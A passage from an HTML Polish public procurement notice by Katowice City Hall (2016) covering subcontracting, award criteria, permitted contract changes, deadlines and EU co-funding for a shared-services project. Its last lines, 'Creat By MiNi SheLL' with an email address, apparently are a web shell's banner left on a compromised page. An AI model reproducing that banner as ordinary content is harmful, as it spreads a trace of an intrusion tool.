2)  Jeśli wykonanie zamówienia zostanie powierzone podwykonawcom - wykonawca w swojej ofercie winien wskazać, którą część będzie wykonywał podwykonawca. W przypadku gdy wykonawca, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, powołuje się na zasadach określonych w art. 26 ust. 2b ustawy na zasoby podmiotu trzeciego, a podmiot ten wykonuje część zamówienia, to wykonawca w swojej ofercie winien również podać nazwę (firmę) tych podmiotów (podwykonawców).

3)  Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym, niż wymagany w trakcie postępowania o udzielenie zamówienia.

Uwaga
Zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane w razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa w pkt III.4) i III.6) budzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego dostawy lub usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów, bezpośrednio zamawiającemu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Funkcjonalność systemu wspomagania zarządzania projektem - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)    Zmiana postanowień umowy może nastąpić wyłącznie na warunkach określonych poniżej:

a)    Zamawiający z ważnych przyczyn nie dających się przewidzieć w chwili zawarcia umowy, wstrzyma wykonanie prac;

b)    nastąpi zmiana obowiązującej stawki VAT;

c)     nastąpi zmiana wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,

d)    nastąpi zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,

e)    zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można uniknąć ani im zapobiec,

f)      nastąpiła siła wyższa - zdarzenie zewnętrzne, na które Strony nie mają wpływu, a które uniemożliwiają wykonanie zobowiązań wynikających z umowy, których nie można było przewidzieć i których nie dało się uniknąć nawet w przypadku dołożenia przez Strony najwyższej staranności, w szczególności takie jak: wojna, rozruchy, trzęsienie ziemi, pożar, eksplozja, decyzja administracyjna, na którą Strony nie mają wpływu,

g)    aneksem do umowy o dofinansowanie ze środków RPO WSL na lata 2014-2020 dokonano zmiany harmonogramu rzeczowo-finansowego projektu Miejskie Centrum Usług Wspólnych w Katowicach, w tym w szczególności - zmiany terminu rzeczowego zakończenia realizacji Projektu,

h)    odstąpiono od realizacji całości lub części projektu Miejskie Centrum Usług Wspólnych w Katowicach.

2)    Zmiana umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Katowice, Wydział Informatyki ul. Rynek 1 40-003 Katowice pokój 411 (IV piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2016 godzina 09:00, miejsce: Urząd Miasta Katowice, Wydział Informatyki ul. Rynek 1 40-003 Katowice pokój 411 (IV piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie będzie współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020.

2.      Termin i miejsce realizacji zamówienia

1)  Zamówienie należy realizować od dnia podpisania umowy przez okres do 31.12.2019 r.

2)  Miejsce realizacji zamówienia: miasto Katowice.

3. Do porównania i oceny ofert w kryterium funkcjonalność systemu wspomagania zarządzania  projektem stosowana będzie zasada, że funkcjonalność systemu oceniana będzie na podstawie złożonego przez Wykonawcę w ofercie Opisu posiadanego systemu wspomagania zarządzania projektem spośród funkcjonalności określonych w zał. nr 8 Szczegółowy opis przedmiotu zamówienia jako Dodatkowe funkcjonalności oceniane przez Komisję przetargową w ramach kryterium jakości (pod literami i-w) zapewnioną w stopniu przynajmniej dobrym.

Za każdą funkcjonalność Wykonawca może otrzymać 1 pkt, co jest równoznaczne z 1 %.

Maksymalnie wykonawca może otrzymać 15 pkt (co jest równe 15% znaczenia tego kryterium)

Otrzymanie 0 punktów nie spowoduje odrzucenia oferty.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com